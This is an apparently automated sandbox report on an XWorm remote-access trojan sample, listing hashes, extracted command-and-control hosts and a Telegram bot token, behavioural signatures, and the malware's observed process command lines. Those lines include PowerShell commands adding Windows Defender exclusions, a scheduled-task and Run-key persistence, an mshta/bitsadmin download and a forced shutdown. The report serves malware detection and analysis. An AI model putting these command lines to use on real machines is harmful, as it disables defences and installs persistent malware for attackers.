Analysis
max time kernel: 93s
max time network: 94s
platform: windows7_x64
resource: win7-20240220-en
resource tags: arch:x64, arch:x86, image:win7-20240220-en, locale:en-us, os:windows7-x64, system
submitted: 31-05-2024 03:18
Static task: static1
Behavioral task: behavioral1
  Sample: Output.exe
  Resource: win7-20240220-en
Behavioral task: behavioral2
  Sample: Output.exe
  Resource: win10v2004-20240426-en
General
Target: Output.exe
Size: 122KB
MD5: fd08b9ac311ff6eb9c24e79ebb829b0c
SHA1: e2a8a4a97f104cc6c9fcb43d2e15e05bf0c73ff3
SHA256: 3c63c4ca4f2fe4c5541ecb267e8c98154dcd1ec3dada24efa8b50ec8d4542824
SHA512: 55829d66ef2b92e96c693c6af08008602b19754ada2c9100d3f630de69742d99d4b87cf89518402c1a0c05b4da81129793dd489a6af4d0ae5df520f783432dab
SSDEEP: 3072:mz8hmIvtEwHJp7eiH7o8cB5+LuLjB3/IMKilf55:LEUJpp0/cKLj9wMK
Malware Config
Extracted: xworm
  127.0.0.1:40971
  us3.localto.net:40971
  Name1442-40971.portmap.host:40971
  Install_directory: %Temp%
  install_file: KVRT.exe
  telegram: https://api.telegram.org/bot6916721041:AAGsGXyaplDWQ9HJlE88Z36KtBFClSB3E20
Signatures
Detect Xworm Payload (4 IoCs)
  resource | yara_rule
  C:\Users\Admin\AppData\Roaming\KVRT.exe | family_xworm
  behavioral1/memory/2344-9-0x0000000000E20000-0x0000000000E3E000-memory.dmp | family_xworm
  behavioral1/memory/2724-42-0x00000000003E0000-0x00000000003FE000-memory.dmp | family_xworm
  behavioral1/memory/2784-46-0x0000000000100000-0x000000000011E000-memory.dmp | family_xworm
Command and Scripting Interpreter: PowerShell (1 TTPs, 4 IoCs)
  Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
  pid | process
  2952 | powershell.exe
  2828 | powershell.exe
  2728 | powershell.exe
  1868 | powershell.exe
Downloads MZ/PE file
Drops startup file (2 IoCs)
  description | ioc | process
  File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KVRT.lnk | KVRT.exe
  File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KVRT.lnk | KVRT.exe
Executes dropped EXE (3 IoCs)
  pid | process
  2344 | KVRT.exe
  2724 | KVRT.exe
  2784 | KVRT.exe
Adds Run key to start application (2 TTPs, 1 IoCs)
  description | ioc | process
  Set value (str) | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Windows\CurrentVersion\Run\KVRT = "C:\\Users\\Admin\\AppData\\Local\\Temp\\KVRT.exe" | KVRT.exe
Looks up external IP address via web service (1 IoCs)
  Uses a legitimate IP lookup service to find the infected system's external IP.
  flow | ioc
  8 | ip-api.com
Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s).
Creates scheduled task(s) (1 TTPs, 1 IoCs)
  Schtasks is often used by malware for persistence or to perform post-infection execution.
Download via BitsAdmin (1 TTPs, 1 IoCs)
Suspicious behavior: AddClipboardFormatListener (1 IoCs)
  pid | process
  2344 | KVRT.exe
Suspicious behavior: EnumeratesProcesses (5 IoCs)
  pid | process
  2952 | powershell.exe
  2828 | powershell.exe
  2728 | powershell.exe
  1868 | powershell.exe
  2344 | KVRT.exe
Suspicious use of AdjustPrivilegeToken (10 IoCs)
  description | pid | process
  Token: SeDebugPrivilege | 2344 | KVRT.exe
  Token: SeDebugPrivilege | 2952 | powershell.exe
  Token: SeDebugPrivilege | 2828 | powershell.exe
  Token: SeDebugPrivilege | 2728 | powershell.exe
  Token: SeDebugPrivilege | 1868 | powershell.exe
  Token: SeDebugPrivilege | 2344 | KVRT.exe
  Token: SeDebugPrivilege | 2724 | KVRT.exe
  Token: SeDebugPrivilege | 2784 | KVRT.exe
  Token: SeShutdownPrivilege | 2768 | shutdown.exe
  Token: SeRemoteShutdownPrivilege | 2768 | shutdown.exe
Suspicious use of SetWindowsHookEx (1 IoCs)
  pid | process
  2344 | KVRT.exe
Suspicious use of WriteProcessMemory (35 IoCs; identical entries collapsed, occurrences column gives the count)
  description | pid | process | target process | occurrences
  PID 2192 wrote to memory of 2344 | 2192 | Output.exe | KVRT.exe | 3
  PID 2192 wrote to memory of 2708 | 2192 | Output.exe | mshta.exe | 4
  PID 2708 wrote to memory of 2640 | 2708 | mshta.exe | bitsadmin.exe | 4
  PID 2344 wrote to memory of 2952 | 2344 | KVRT.exe | powershell.exe | 3
  PID 2344 wrote to memory of 2828 | 2344 | KVRT.exe | powershell.exe | 3
  PID 2344 wrote to memory of 2728 | 2344 | KVRT.exe | powershell.exe | 3
  PID 2344 wrote to memory of 1868 | 2344 | KVRT.exe | powershell.exe | 3
  PID 2344 wrote to memory of 2752 | 2344 | KVRT.exe | schtasks.exe | 3
  PID 2272 wrote to memory of 2724 | 2272 | taskeng.exe | KVRT.exe | 3
  PID 2272 wrote to memory of 2784 | 2272 | taskeng.exe | KVRT.exe | 3
  PID 2344 wrote to memory of 2768 | 2344 | KVRT.exe | shutdown.exe | 3
Uses Task Scheduler COM API (1 TTPs)
  The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
- C:\Users\Admin\AppData\Local\Temp\Output.exe (PID 2192)
  Command line: "C:\Users\Admin\AppData\Local\Temp\Output.exe"
  Signatures: Suspicious use of WriteProcessMemory
  - C:\Users\Admin\AppData\Roaming\KVRT.exe (PID 2344)
    Command line: "C:\Users\Admin\AppData\Roaming\KVRT.exe"
    Signatures: Drops startup file; Executes dropped EXE; Adds Run key to start application; Suspicious behavior: AddClipboardFormatListener; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of SetWindowsHookEx; Suspicious use of WriteProcessMemory
    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 2952)
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\KVRT.exe'
      Signatures: Command and Scripting Interpreter: PowerShell; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 2828)
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'KVRT.exe'
      Signatures: Command and Scripting Interpreter: PowerShell; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 2728)
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\KVRT.exe'
      Signatures: Command and Scripting Interpreter: PowerShell; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 1868)
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'KVRT.exe'
      Signatures: Command and Scripting Interpreter: PowerShell; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
    - C:\Windows\System32\schtasks.exe (PID 2752)
      Command line: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "KVRT" /tr "C:\Users\Admin\AppData\Local\Temp\KVRT.exe"
      Signatures: Creates scheduled task(s)
    - C:\Windows\system32\shutdown.exe (PID 2768)
      Command line: shutdown.exe /f /s /t 0
      Signatures: Suspicious use of AdjustPrivilegeToken
  - C:\Windows\SysWOW64\mshta.exe (PID 2708)
    Command line: "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta"
    Signatures: Suspicious use of WriteProcessMemory
    - C:\Windows\SysWOW64\bitsadmin.exe (PID 2640)
      Command line: "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://devbuilds.s.kaspersky-labs.com/devbuilds/KVRT/latest/full/KVRT.exe C:\Users\Admin\AppData\Local\Temp\KVRT.exe
      Signatures: Download via BitsAdmin
- C:\Windows\system32\taskeng.exe (PID 2272)
  Command line: taskeng.exe {4CB9AD00-B271-4685-9B17-9A43F0BFED00} S-1-5-21-2721934792-624042501-2768869379-1000:BISMIZHX\Admin:Interactive:[1]
  Signatures: Suspicious use of WriteProcessMemory
  - C:\Users\Admin\AppData\Local\Temp\KVRT.exe (PID 2724)
    Command line: C:\Users\Admin\AppData\Local\Temp\KVRT.exe
    Signatures: Executes dropped EXE; Suspicious use of AdjustPrivilegeToken
  - C:\Users\Admin\AppData\Local\Temp\KVRT.exe (PID 2784)
    Command line: C:\Users\Admin\AppData\Local\Temp\KVRT.exe
    Signatures: Executes dropped EXE; Suspicious use of AdjustPrivilegeToken
- C:\Windows\system32\LogonUI.exe (PID 2788)
  Command line: "LogonUI.exe" /flags:0x0
- C:\Windows\system32\LogonUI.exe (PID 2052)
  Command line: "LogonUI.exe" /flags:0x1
MITRE ATT&CK Enterprise v15
Downloads
- Filesize: 877B
  MD5: 26fde2dde716bf34ccd01dc4e14a1513
  SHA1: c0f9355285806e665cd8adb5f505e6dd1a829058
  SHA256: 3f132ede178bfbe1e0271cf42f9209a9e51ef3be491d5cce9e4c8a82349b67f9
  SHA512: 70667597d52e1b3d2db35c6d6f4fbb346d523c42f460ee4b1c34e4257ae66bc69e9a1369b0fbe9fe7d580491233ae94cb3507c098f9927cc90daf8d29eb3cd8c
- Filesize: 95KB
  MD5: caacc00a3a1be01e99f29abcf5f242c4
  SHA1: 2605c5337c15fda32deafe27d49baf34ab892561
  SHA256: 209e122072c202f0e7663407dbfb6c99774360ee736fcaad8a6998adbb06224e
  SHA512: 3ca0c64f573bb07b2b93ec2bbffe9684bbc6e764f0ab07d716d1d035897aaf0c6d71444e569deb28ef57067717b30f52b20eba5176c657fe0c69746778d852e1
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\4AKPAXVNRLS3K8YT3LWT.temp
  Filesize: 7KB
  MD5: bc1a15d6099150439bc7abe4ebf51091
  SHA1: 202b59aac99209fdbcf37777adca931a1d88b746
  SHA256: 28d8447902a66787f5454124377b459d518f3108e88439ea34e6e33c45aabe43
  SHA512: 9fd3f16bf233ee0eefbc6fc001083e34e2fd08f2012055ac23b6d0b5301313a92b65802f7b25eb7bc800255404ed9a8f2a86ea95b6d94082b6ba0945d8027f2a